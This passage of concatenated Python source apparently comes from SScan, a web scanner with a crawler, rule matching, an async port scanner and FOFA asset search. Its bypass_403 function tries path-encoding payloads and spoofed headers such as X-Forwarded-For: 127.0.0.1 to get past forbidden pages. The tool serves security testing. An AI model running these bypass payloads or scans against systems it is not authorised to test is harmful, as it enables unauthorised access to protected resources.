except requests.exceptions.ReadTimeout as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
except requests.exceptions.ConnectionError as e:
logger.log('DEBUG', f'IP可能被封了 {str(e)} {self.base_url + url}')
return -1, {}, ''
except TypeError as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
except Exception as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
logger.log('DEBUG', f'{traceback.format_exc()}')
return -1, {}, ''
def bypass_403(self, url_403, timeout=5):
try:
resp = self.session.get(self.base_url + url_403, allow_redirects=False, headers=default_headers,
timeout=timeout)
OriginalUrl = url_403
Rurl = url_403
if OriginalUrl == "/test-scan-404-existence-check":
return
if Rurl != "/":
Rurl = url_403.rstrip("/")
PreviousPath = '/'.join(str(Rurl).split('/')[:-1])
LastPath = str(Rurl).split('/')[-1]
payloads = ["%2e/" + LastPath, "%2f/" + LastPath, LastPath + "/.", LastPath + "/./.",
LastPath + "/././", LastPath + "/./", "./" + LastPath + "/./", LastPath + "%20/",
LastPath + "%09/", "%20" + LastPath + "%20/", LastPath + "/..;/", LastPath + "..;/",
LastPath + "?", LastPath + "??", LastPath + "???", LastPath + "//", LastPath + "/*",
LastPath + "/*/", "/" + LastPath + "//", LastPath + "/", LastPath + "/.randomstring"]
for p in payloads:
url = PreviousPath + "/" + p
resp_p = self.session.get(self.base_url + url, allow_redirects=False, headers=default_headers,
timeout=timeout)
# 当状态码为200时,且该页面的 Content-Length 不与首页相等时,认为可以绕过403
if resp_p.status_code == 200 and resp_p.headers.get('Content-Length') != resp.headers.get('Content-Length'):
if OriginalUrl not in self.results:
self.results[OriginalUrl] = []
_ = {'status': resp_p.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl),
'title': f'绕过payload: {self.base_url}{url}', 'vul_type': "403绕过"}
if _ not in self.results[OriginalUrl]:
self.results[OriginalUrl].append(_)
break
hpayloads = [{"X-Rewrite-URL": OriginalUrl}, {"X-Original-URL": OriginalUrl}, {"Referer": "/" + LastPath},
{"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Originating-IP": "127.0.0.1"},
{"X-Forwarded-For": "127.0.0.1"}, {"X-Remote-IP": "127.0.0.1"},
{"X-Client-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"}, {"X-Forwarded-Host": "127.0.0.1"}]
for hp in hpayloads:
# 这个headers 是为了防止update时,连续添加入字典,不能使用default_headers,不然会连续增加,default_headers会发生变化
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
"Connection": "close",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
}
key, = hp
value, = hp.values()
new_url = ""
if key == "X-Original-URL":
new_url = Rurl + "4nyth1ng"
if key == "X-Rewrite-URL":
new_url = "/"
# Add header
headers.update(hp)
if new_url:
url = new_url
else:
url = OriginalUrl
resp_hp = self.session.get(self.base_url + url, allow_redirects=False, headers=headers, timeout=timeout)
# 当状态码为200时,且该页面的 Content-Length 不与首页相等时,认为可以绕过403
if resp_hp.status_code == 200 and resp_hp.headers.get('Content-Length') != resp.headers.get(
'Content-Length'):
if OriginalUrl not in self.results:
self.results[OriginalUrl] = []
_ = {'status': resp.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl),
'title': f'绕过payload: {self.base_url}{url}, Header payload: {key}: {value}',
'vul_type': "403绕过"}
if _ not in self.results[OriginalUrl]:
self.results[OriginalUrl].append(_)
break
except Exception:
pass
# 检查状态404是否存在
def check_404_existence(self):
try:
try:
self._404_status, _, html_doc = self.http_request('/test-scan-404-existence-check')
except Exception as e:
logger.log('DEBUG', f'HTTP 404 check failed: {self.base_url} {str(e)}')
self._404_status, _, html_doc = -1, {}, ''
if self._404_status != 404:
self.len_404_doc = len(html_doc)
except Exception as e:
logger.log('DEBUG', f'[Check_404] Exception {self.base_url} {str(e)}')
# 将检查完的 path 加入队列,加载规则和脚本
def enqueue(self, path):
try:
path = str(path)
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
return False
try:
# BBScan 中 当 path 中存在数字时,将url中的数字替换成 {num} /asdas12asd >> /asdas{num}asd
# todo 看不懂在干嘛
# url_pattern = re.sub(r'\d+', '{num}', path)
url_pattern = path
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.links_limit:
return False
self.urls_processed.add(url_pattern)
if self.args.crawl: # 爬取网站的 a 标签
self.crawl(path)
else:
self.index_status, self.index_headers, self.index_html_doc = self.http_request('/')
if self._404_status != -1: # valid web service
# 网站主目录下扫描全部rule, 即rule和root_only标记的rule, 其他目录下扫描 只扫描rule
rule_set_to_process = [self.rules_set, self.rules_set_root_only] if path == '/' else [self.rules_set]
# 加载规则
for rule_set in rule_set_to_process:
for _ in rule_set:
# _ ('/scripts/samples', 'IIS', 200, '', '', True, 'iis')
try:
full_url = path.rstrip('/') + _[0]
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
continue
if full_url in self.urls_enqueued:
continue
url_description = {'prefix': path.rstrip('/'), 'full_url': full_url}
item = (url_description, _[1], _[2], _[3], _[4], _[5], _[6])
self.url_list.append(item)
self.urls_enqueued.add(full_url)
# 本来若只找到 /asdd/asd/ 这种链接,没有/asdd/ 这个子目录,会将/asdd/子目录添加进去处理
if path.count('/') >= 2:
self.enqueue('/'.join(path.split('/')[:-2]) + '/') # sub folder enqueue
if path != '/' and not self.no_scripts:
for script in self.user_scripts:
self.url_list.append((script, path))
return True
except Exception as e:
logger.log('ERROR', f'[_enqueue.exception] %s' % str(e))
logger.log('DEBUG', f'{traceback.format_exc()}')
return False
# 在页面中匹配rules的白名单规则
def find_text(self, html_doc):
for _text in self.text_to_find:
if html_doc.find(_text) >= 0:
return True, 'Found [%s]' % _text
for _regex in self.regex_to_find:
if _regex.search(html_doc):
return True, 'Found Regex [%s]' % _regex.pattern
return False
# 匹配黑名单规则
def find_exclude_text(self, html_doc):
for _text in self.text_to_exclude:
if html_doc.find(_text) >= 0:
return True
for _regex in self.regex_to_exclude:
if _regex.search(html_doc):
return True
return False
# 循环爬取页面的超链接,放入队列self.enqueue(), 匹配rules的白名单规则
def crawl(self, path, do_not_process_links=False):
try:
status, headers, html_doc = self.http_request(path)
if path == '/':
self.index_status, self.index_headers, self.index_html_doc = status, headers, html_doc
if self.args.crawl and not do_not_process_links and html_doc:
soup = BeautifulSoup(html_doc, "html.parser")
# 循环爬取a标签
for link in soup.find_all('a'):
url = link.get('href', '').strip()
if url.startswith('..'):
continue
if not url.startswith('/') and url.find('//') < 0: # 相对路径
url = path + url
url, depth = cal_depth(self, url)
if depth <= self.max_depth:
self.enqueue(url)
# 匹配rules的白名单规则
ret = self.find_text(html_doc)
if ret:
if '/' not in self.results:
self.results['/'] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, path), 'title': title, 'vul_type': ret[1]}
if _ not in self.results['/']:
self.results['/'].append(_)
except Exception as e:
logger.log('ERROR', f'[crawl Exception] %s %s' % (path, str(e)))
# 读取rules目录下的相关规则
def _init_rules(self):
self.text_to_find = self.args.text_to_find
self.regex_to_find = self.args.regex_to_find
self.text_to_exclude = self.args.text_to_exclude
self.regex_to_exclude = self.args.regex_to_exclude
self.rules_set = self.args.rules_set
self.rules_set_root_only = self.args.rules_set_root_only
def _init_scripts(self):
self.user_scripts = []
if self.args.no_scripts: # 全局禁用插件,无需导入
return
for _script in self.args.script_files:
# 跳过__init__.py
if '_init_' in _script:
continue
script_name_origin = os.path.basename(_script)
script_name = script_name_origin.replace('.py', '')
try:
self.user_scripts.append(importlib.import_module('pocs.scripts.%s' % script_name))
except Exception as e:
logger.log('ERROR', f'Fail to load script %s, {e}' % script_name)
def scan_worker(self, item):
if not self.flag and time.time() - self.start_time > self.timeout:
self.flag = True
if self.flag:
self.url_list.clear()
# self.flag = False
logger.log('ERROR', f'Timed out task: %s' % self.base_url)
return
url, url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type, prefix = None, None, None, None, None, None, None, None, None
try:
if len(item) == 2: # Script Scan
check_func = getattr(item[0], 'do_check')
check_func(self, item[1])
else:
# ({'prefix': '', 'full_url': '/trace'}, 'Spring boot serverProperties', 200, '', '', True, 'springboot')
url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type = item
prefix = url_description['prefix']
url = url_description['full_url']
'''
{sub} 这个是规则里设置的, 主要是根据当前域名来做字典,
比如{sub}.sql ,当前域名为baidu.com ,则规则改为 baidu.sql
'''
if url.find('{sub}') >= 0:
if not self.domain_sub:
return
url = url.replace('{sub}', self.domain_sub)
except Exception as e:
logger.log('ERROR', f'[scan_worker.1][%s %s] {e}' % (item[0], item[1]))
return
if not item or not url:
return
# 开始规则目录探测
try:
status, headers, html_doc = self.http_request(url)
cur_content_type = headers.get('content-type', '')
cur_content_length = headers.get('content-length', len(html_doc))
if self.find_exclude_text(html_doc): # 黑名单规则排除
return
if 0 <= int(cur_content_length) <= 10: # text too short
return
if cur_content_type.find('image/') >= 0: # exclude image
return
# 当指定 content_type 时,
if content_type and content_type != 'json' and cur_content_type.find('json') >= 0:
return
# content type mismatch
if (content_type and cur_content_type.find(content_type) < 0) or (
content_type_no and cur_content_type.find(content_type_no) >= 0):
return
if tag and html_doc.find(tag) < 0:
return # tag mismatch
# 在页面中匹配rules的白名单规则
if self.find_text(html_doc) and status == 200:
valid_item = True
else:
# status code check
if status_to_match == 206 and status != 206:
return
if status_to_match in (200, 206) and status in (200, 206):
valid_item = True
elif status_to_match and status != status_to_match:
return
elif status in (403, 404) and status != status_to_match:
return
else:
valid_item = True
if status == self._404_status and url != '/':
len_doc = len(html_doc)
len_sum = self.len_404_doc + len_doc
if len_sum == 0 or (0.4 <= float(len_doc) / len_sum <= 0.6):
return
if valid_item:
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
if prefix not in self.results:
self.results[prefix] = []
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title, 'vul_type': vul_type}
if _ not in self.results[prefix]:
self.results[prefix].append(_)
except Exception:
logger.log('ERROR', f'[scan_worker.2][%s%s]' % (self.base_url, url))
logger.log('DEBUG', f'{traceback.format_exc()}')
# 使用多线程对目标进行扫描
def scan(self):
try:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
import platform
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
executor = ThreadPoolExecutor(self.args.t)
tasks = [loop.run_in_executor(executor, self.scan_worker, item) for item in self.url_list]
# 这一步很重要,使用loop.run_in_executor()函数: 内部接受的是阻塞的线程池,执行的函数,传入的参数
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
# 扫描完成后, 计算 self._403_url 的大小
if len(self._403_url) < 20:
logger.log("DEBUG", f'对 {self.base_url} 进行 403 绕过测试')
for resp in self._403_url:
self.bypass_403(resp)
# 等待所有的任务完成
for key in self.results.keys():
# todo 为何?
# 超过5个网址在这个文件夹下发现,保留第一个
if len(self.results[key]) > 5:
self.results[key] = self.results[key][:1]
return self.base_url.lstrip('unknown://').rstrip(':None'), self.results
except Exception as e:
logger.log('ERROR', f'[scan exception] {e}')
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import re
import json
import ipaddress
from urllib.parse import urlparse
from lib.config.log import logger
from lib.config.setting import fofaApi, default_headers
import requests
import sys
import os
# ctrl c 退出时,屏幕上不输出丑陋的traceback信息
def ctrl_quit(_sig, _frame):
    """SIGINT handler: log and hard-exit so Ctrl-C prints no ugly traceback."""
    logger.log('ALERT', f'Scan aborted.')
    os._exit(0)  # bypass atexit/finally blocks; immediate process exit
def check_fofa():
    """Verify the configured fofa API credentials with a live 'info/my' call.

    Returns False when no email/key pair is configured, True when the API
    accepts the credentials; exits the process on rejection or network error.
    """
    # nothing to verify without a configured key pair
    if not (fofaApi['email'] and fofaApi['key']):
        return False
    logger.log('INFOR', f'正在验证fofa Api...')
    account_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(
        fofaApi['email'], fofaApi['key'])
    try:
        status = requests.get(account_url, headers=default_headers, timeout=10, verify=False).status_code
    except requests.exceptions.ReadTimeout as e:
        logger.log('ERROR', f'请求超时 {e}')
        exit(-1)
    except requests.exceptions.ConnectionError as e:
        logger.log('ERROR', f'网络超时 {e}')
        exit(-1)
    if status != 200:
        logger.log('ERROR', f'状态码{status}, 请确保config/setting.py中fofaApi配置正确')
        exit(-1)
    logger.log('INFOR', f'fofa Api调用正常')
    return True
# 读取rules目录下的相关规则
# read the rule definitions from the files under the rules directory
def read_rules(rule_files):
    """Parse rule files plus the white/black list files.

    Each rule line starting with '/' becomes a 7-tuple:
    (path, tag, status, content_type, content_type_no, root_only, vul_type)
    where optional {tag=...}/{status=...}/{type=...}/{type_no=...}/{root_only}
    markers on the line fill the extra fields.

    Returns (text_to_find, regex_to_find, text_to_exclude, regex_to_exclude,
    rules_set, rules_set_root_only), or None when pocs/rules/white.list or
    pocs/rules/black.list is missing.
    """
    text_to_find = []
    regex_to_find = []
    text_to_exclude = []
    regex_to_exclude = []
    rules_set = set()
    rules_set_root_only = set()
    p_tag = re.compile('{tag="(.*?)"}')
    p_status = re.compile(r'{status=(\d{3})}')
    p_content_type = re.compile('{type="(.*?)"}')
    p_content_type_no = re.compile('{type_no="(.*?)"}')
    _files = rule_files
    # parse every rule file
    for rule_file in _files:
        with open(rule_file, 'r', encoding='utf-8') as infile:
            # vul_type is the rule file's basename without its extension
            vul_type = os.path.basename(rule_file)[:-4]
            for url in infile.readlines():
                url = url.strip()
                if url.startswith('/'):
                    _ = p_tag.search(url)
                    tag = _.group(1) if _ else ''  # empty when no tag marker present
                    _ = p_status.search(url)
                    status = int(_.group(1)) if _ else 0
                    _ = p_content_type.search(url)
                    content_type = _.group(1) if _ else ''
                    _ = p_content_type_no.search(url)
                    content_type_no = _.group(1) if _ else ''
                    root_only = True if url.find('{root_only}') >= 0 else False
                    rule = (url.split()[0], tag, status, content_type, content_type_no, root_only, vul_type)
                    if root_only:
                        if rule not in rules_set_root_only:
                            rules_set_root_only.add(rule)
                        else:
                            logger.log('ERROR', f'Duplicated root only rule: {rule}')
                    else:
                        if rule not in rules_set:
                            rules_set.add(rule)
                        else:
                            logger.log('ERROR', f'Duplicated rule: {rule}')
    # read the body whitelist / blacklist match expressions
    re_text = re.compile('{text="(.*)"}')
    re_regex_text = re.compile('{regex_text="(.*)"}')
    white_file_path = 'pocs/rules/white.list'
    if not os.path.exists(white_file_path):
        logger.log('ERROR', f'File not exist: {white_file_path}')
        return
    for _line in open(white_file_path, 'r', encoding='utf-8'):
        _line = _line.strip()
        if not _line or _line.startswith('#'):
            continue
        _m = re_text.search(_line)
        if _m:
            text_to_find.append(_m.group(1))
        else:
            _m = re_regex_text.search(_line)
            if _m:
                regex_to_find.append(re.compile(_m.group(1)))
    black_file_path = 'pocs/rules/black.list'
    if not os.path.exists(black_file_path):
        logger.log('ERROR', f'File not exist: {black_file_path}')
        return
    for _line in open(black_file_path, 'r', encoding='utf-8'):
        _line = _line.strip()
        if not _line or _line.startswith('#'):
            continue
        _m = re_text.search(_line)
        if _m:
            text_to_exclude.append(_m.group(1))
        else:
            _m = re_regex_text.search(_line)
            if _m:
                regex_to_exclude.append(re.compile(_m.group(1)))
    return text_to_find, regex_to_find, text_to_exclude, regex_to_exclude, rules_set, rules_set_root_only
def ip_to_int(ip):
    """Convert a dotted-quad IPv4 string to its integer value.

    Integers pass through unchanged; unparseable input logs an error and
    yields 0.
    """
    if isinstance(ip, int):
        return ip
    try:
        return int(ipaddress.IPv4Address(ip))
    except Exception as e:
        logger.log('ERROR', f'{repr(e)}')
        return 0
def load_json(path):
    """Read the file at *path* and return its parsed JSON content."""
    fp = open(path)
    try:
        return json.load(fp)
    finally:
        fp.close()
def clear_queue(this_queue):
    """Drain *this_queue*, discarding items until get_nowait() raises."""
    while True:
        try:
            this_queue.get_nowait()
        except Exception:
            # queue is empty (or unusable) — done either way
            return
def get_html(headers, resp):
    """Return the decoded body of *resp* when its content-type indicates
    text/html content, otherwise an empty string."""
    ctype = headers.get('content-type', '')
    if 'text' in ctype or 'html' in ctype:
        # decode with charset fallbacks to avoid mojibake
        return decode_response_text(resp.content)
    return ''
# 解决中文乱码
# decode response bytes, trying the declared charset then common encodings
def decode_response_text(txt, charset=None):
    """Decode raw response bytes *txt* into text.

    Tries *charset* first (when given), then a fixed list of common
    encodings, then lossy ASCII; raises when everything fails.
    """
    candidates = ([charset] if charset else []) + ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']
    for encoding in candidates:
        try:
            return txt.decode(encoding)
        except Exception:
            continue
    try:
        return txt.decode('ascii', 'ignore')
    except Exception:
        pass
    raise Exception('Fail to decode response Text')
def get_domain_sub(host):
    """Return the left-most domain label of *host* (baidu.com -> 'baidu'),
    or '' when the host part is an IPv4 address."""
    bare_host = host.split(':')[0]  # drop any :port suffix before the check
    if re.search(r'\d+\.\d+\.\d+\.\d+', bare_host):
        return ''
    return host.split('.')[0]
def save_script_result(self, status, url, title, vul_type=''):
    """Append one plug-in finding for *url* to self.results, creating the
    per-url bucket on first use."""
    bucket = self.results.setdefault(url, [])
    bucket.append({'status': status, 'url': url, 'title': title, 'vul_type': vul_type})
def escape(html):
    """HTML-escape *html* so it can be embedded safely in report markup.

    BUGFIX: the previous version replaced each character with itself
    (the entity names had been lost), making the function a no-op.
    '&' is replaced first so the entities produced by the later
    substitutions are not themselves re-escaped.
    """
    return html.replace('&', '&amp;').\
        replace('<', '&lt;').replace('>', '&gt;').\
        replace('"', '&quot;').replace("'", '&#39;')
# 计算给定URL的深度,返回元组(URL, depth)
def cal_depth(self, url):
if url.find('#') >= 0:
url = url[:url.find('#')] # cut off fragment
if url.find('?') >= 0:
url = url[:url.find('?')] # cut off query string
# 当存在一下三种情况时,判断不是当前超链不是当前域名,或者没有http服务,则不加入队列
if url.startswith('//'):
return '', 10000 # //www.baidu.com/index.php
if not urlparse(url, 'http').scheme.startswith('http'):
return '', 10000 # no HTTP protocol
if url.lower().startswith('http'):
_ = urlparse(url, 'http')
if _.netloc == self.host: # same hostname
url = _.path
else:
return '', 10000 # not the same hostname
while url.find('//') >= 0:
url = url.replace('//', '/')
if not url:
return '/', 1 # http://www.example.com
if url[0] != '/':
url = '/' + url
url = url[: url.rfind('/') + 1]
if url.split('/')[-2].find('.') > 0:
url = '/'.join(url.split('/')[:-2]) + '/'
depth = url.count('/')
return url, depth
def get_host(url):
    """Split *url* into ``(hostname, scheme)``.

    The scheme defaults to 'http' when the URL carries none; any ':port'
    suffix is stripped from the hostname.
    """
    if '://' in url:
        scheme, netloc, _path, _params, _query, _fragment = urlparse(url, 'http')
    else:
        scheme = 'http'
        slash = url.find('/')
        netloc = url[:slash] if slash > 0 else url
    # drop the port, if any
    host = netloc.split(':')[0] if ':' in netloc else netloc
    return host, scheme
'''
验证是否为内网IP
私有IP: A类 10.0.0.0-10.255.255.255
B类 172.16.0.0-172.31.255.255
C类 192.168.0.0-192.168.255.255
当然,还有 127.0.0.1 这个环回地址
'''
def intranet_ip(ip):
    """Return True when *ip* is a private (RFC 1918) or loopback IPv4 address.

    Replaces the hand-rolled octet regexes with ipaddress network membership:
    less error-prone, and now returns an explicit False (instead of an
    implicit None) for public or unparseable input. The loopback check is
    generalised from the single address 127.0.0.1 to the whole 127.0.0.0/8
    block, which is what the original docstring described.
    """
    private_nets = (
        ipaddress.IPv4Network('10.0.0.0/8'),       # class A private
        ipaddress.IPv4Network('172.16.0.0/12'),    # class B private
        ipaddress.IPv4Network('192.168.0.0/16'),   # class C private
        ipaddress.IPv4Network('127.0.0.0/8'),      # loopback
    )
    try:
        addr = ipaddress.IPv4Address(ip)
    except (ipaddress.AddressValueError, ValueError):
        return False  # not a plain IPv4 literal
    return any(addr in net for net in private_nets)
# 根据指定的掩码,添加ip
def add_ip(args, queue_targets):
ip_subnet = []
# 筛选目标中的ip, 当指定其它掩码时,根据该ip添加目标(当目标存在cdn时不会添加该段的其它目标)
ip_targets = []
for target in queue_targets:
if re.match(r".*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).*",
target):
host, scheme = get_host(target)
ip_targets.append(host)
# 当指定子网掩码时的处理逻辑, 将对应网段ip加入处理目标中
if args.network != 32:
for ip in ip_targets:
if ip.find('/') > 0: # 网络本身已经处理过 118.193.98/24
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
if _network in ip_targets:
continue
ip_targets.append(_network)
if args.network >= 20:
sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
else:
sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
for sub_net in sub_nets:
if sub_net in ip_targets:
continue
if type(sub_net) == ipaddress.IPv4Network: # add network only
ip_targets.append(str(sub_net))
for _ip in sub_net:
_ip = str(_ip)
if _ip not in ip_targets:
ip_subnet.append(_ip)
return ip_subnet
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/22 21:46
# @Author : yhy
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# ANSI colour escape codes used by the banner and console output
yellow = '\033[01;33m'
white = '\033[01;37m'
green = '\033[01;32m'
blue = '\033[01;34m'
red = '\033[1;31m'
end = '\033[0m'  # reset attributes
version = 'v0.8'
# version tag rendered inside the ASCII-art banner
message = white + '{' + red + version + ' #dev' + white + '}'
# start-up banner printed by the CLI entry point
SScan_banner = f"""{yellow}
SScan is a slow sensitive information detection and vulnerability scanning program.{green}
_____ _____
/ ____/ ____|
| (___| (___ ___ __ _ _ __ {message}{blue}
\___ \\___ \ / __/ _` | '_ \
____) |___) | (_| (_| | | | |
|_____/_____/ \___\__,_|_| |_|
{red}By yhy(https://github.com/yhy0/SScan.git) {blue}
"""
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/3/7 14:54
# @Author : yhy
from lib.config.datatype import AttribDict
# shared attribute-style dict used to pass fofa query state between modules
fofa_info = AttribDict()
--- FILE SEPARATOR ---
'''
使用oneforall中的配置
https://github.com/shmilylty/OneForAll/blob/master/config/log.py
'''
import sys
import pathlib
from loguru import logger
# 路径设置
# path setup
relative_directory = pathlib.Path.cwd()  # SScan working directory
log_save_dir = relative_directory.joinpath('logs')  # directory for log output
log_path = log_save_dir.joinpath(f'sscan.log')  # SScan log file path
LOG_TO_FILE = True  # whether to also write logs to the file above
# logging configuration
# console log format
stdout_fmt = '\r<cyan>{time:YYYY-MM-DD HH:mm:ss,SS}</cyan> ' \
             '[<level>{level: <5}</level>] ' \
             '<blue>{module}</blue>:<cyan>{line}</cyan> - ' \
             '<level>{message}</level> '
# log-file record format
logfile_fmt = '<light-green>{time:YYYY-MM-DD HH:mm:ss,SSS}</light-green> ' \
              '[<level>{level: <5}</level>] ' \
              '<blue>{module}</blue>.<blue>{function}</blue>:' \
              '<blue>{line}</blue> - <level>{message}</level>'
logger.remove()
# custom level set (borrowed from OneForAll)
logger.level(name='TRACE', color='<cyan><bold>', icon='✏️')
logger.level(name='DEBUG', color='<blue><bold>', icon='🐞 ')
logger.level(name='INFOR', no=20, color='<green><bold>', icon='ℹ️')
logger.level(name='QUITE', no=25, color='<green><bold>', icon='🤫 ')
logger.level(name='ALERT', no=30, color='<yellow><bold>', icon='⚠️')
logger.level(name='ERROR', color='<red><bold>', icon='❌️')
logger.level(name='FATAL', no=50, color='<RED><bold>', icon='☠️')
# To run silently in the terminal, change the level below to QUITE.
# The default console level is INFOR.
# loguru is thread-safe by default but not async/multiprocess safe;
# enqueue=True makes it safe for those cases as well.
logger.add(sys.stderr, level='INFOR', format=stdout_fmt, enqueue=True)
# optional file sink
if LOG_TO_FILE:
    logger.add(log_path, level='DEBUG', format=logfile_fmt, enqueue=True, encoding='utf-8')
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/25 10:44
# @Author : yhy
import asyncio
import random
import platform
from lib.common.utils import get_host
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
# 使用协程进行端口扫描
# coroutine-based TCP connect port scanner
class PortScan(object):
    """Asyncio TCP-connect scanner with a rich progress bar.

    Feed it a list of target tuples and call async_tcp_port_scan();
    it returns the tuples whose port accepted a connection.
    """

    def __init__(self, targets, rate=2000, timeout=3):
        super(PortScan, self).__init__()
        self.targets = targets
        self.hosts = []
        self.rate = rate  # concurrency cap (semaphore size)
        self.timeout = timeout  # per-connection timeout in seconds
        self.result = []  # tuples whose port turned out open
        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # hide the bar once it reaches 100%
        )
        self.progress_bar = self.process.add_task("[cyan]port scan...", total=len(self.targets))

    async def async_port_check(self, semaphore, target):
        """Try one TCP connection.

        target: (host, port, scheme, path, origin_port). Returns the same
        fields with 'open'/'close' inserted as the third element.
        """
        async with semaphore:
            host, port = target[0], target[1]
            try:
                conn = asyncio.open_connection(host, port)
                reader, writer = await asyncio.wait_for(conn, timeout=self.timeout)
                # BUGFIX: close the transport via the StreamWriter. The old
                # code called conn.close(), which only closed the *coroutine
                # object* and leaked one socket per open port.
                writer.close()
                try:
                    await writer.wait_closed()
                except Exception:
                    pass  # best effort: the port state is already known
                # e.g. ('127.0.0.1', 80, 'open', 'unknown', '/test.html', 80)
                return host, port, 'open', target[2], target[3], target[4]
            except Exception:
                # timeout / refused / unreachable all mean "closed" here;
                # nothing was opened, so there is nothing to close.
                return host, port, 'close', target[2], target[3], target[4]

    # done-callback: advance the progress bar and keep open ports
    def callback(self, future):
        # future.result() e.g. ('127.0.0.1', 80, 'open', 'unknown', '/test.html', 80)
        result = future.result()
        self.process.advance(self.progress_bar, advance=1)
        if result[2] == "open":
            self.result.append(result)

    def async_tcp_port_scan(self):
        """Run the connect scan over all targets; return the open-port tuples."""
        try:
            sem = asyncio.Semaphore(self.rate)  # concurrency limit
            loop = asyncio.get_event_loop()
            # shuffle so one slow host does not dominate a contiguous stretch
            random.shuffle(self.targets)
            tasks = list()
            with self.process:
                for target in self.targets:
                    task = asyncio.ensure_future(self.async_port_check(sem, target))
                    task.add_done_callback(self.callback)
                    tasks.append(task)
                if platform.system() != "Windows":
                    import uvloop
                    # NOTE(review): setting the policy here cannot affect the
                    # loop already obtained above; kept for parity with the
                    # original control flow.
                    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
                loop.run_until_complete(asyncio.wait(tasks))
        except Exception:
            pass
        return self.result
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/22 21:47
# @Author : yhy
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/3/7 15:15
# @Author : yhy
import aiohttp
import asyncio
from functools import partial
import random
import re
import json
import platform
import base64
from concurrent.futures import ThreadPoolExecutor
from lib.common.connectionPool import conn_pool
from lib.config.setting import fofaApi, fofaSize, USER_AGENTS, fofa_list, fofaCountry
from lib.config.log import logger
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
class Fofa:
def __init__(self, targets, fofa_result):
super(Fofa, self).__init__()
self.email = fofaApi['email']
self.key = fofaApi['key']
self.fofa_result = fofa_result
self.targets = targets
self.result_urls = [] # fofa 查询到的web服务列表
self.urls_list = [] # 去重
self.life_urls = [] # 验证存活的web服务列表
self.urls = [] # fofa查询的 url 列表, 供异步协程使用
self.count = 30 # fofa 一次性查多少个
self.session = conn_pool() # 使用连接池
self.headers = {
"Cache-Control": "max-age=0",
"User-Agent": random.choice(USER_AGENTS),
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
self.process = Progress(
"[progress.description]{task.description}",
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
"•",
TransferSpeedColumn(),
"•",
TimeRemainingColumn(),
transient=True, # 100%后隐藏进度条
)
self.fofa_progress_bar = self.process.add_task("[cyan]FOFA search...", total=len(self.targets))
self.web_progress_bar = None
def run(self):
try:
with self.process:
self.target_formatting() # fofa 查询url 初始化
loop = asyncio.get_event_loop()
loop.run_until_complete(self.fetch_all(loop)) # fofa 搜索
self.session.close()
self.is_life() # 对fofa搜到的结果,取出其中的web服务,然后对web服务进行验证是否可以访问
except Exception as e:
logger.log("ERROR", e)
return self.life_urls
# 为了防止查询过快被fofa封IP, 这里将目标分割,每30个为一组,组内使用 || 语法拼接,一次性查询多个
def target_formatting(self):
for i in range(0, len(self.targets), self.count):
keyword = ''
targets = self.targets[i:i + self.count]
for host in targets:
host = host.replace('\n', '').replace('\r', '').strip()
keyword += f'"{host}" || '
keyword = keyword[:-4] # 去除最后的 ||
keywordsBs = base64.b64encode(keyword.encode('utf-8'))
keywordsBs = keywordsBs.decode('utf-8')
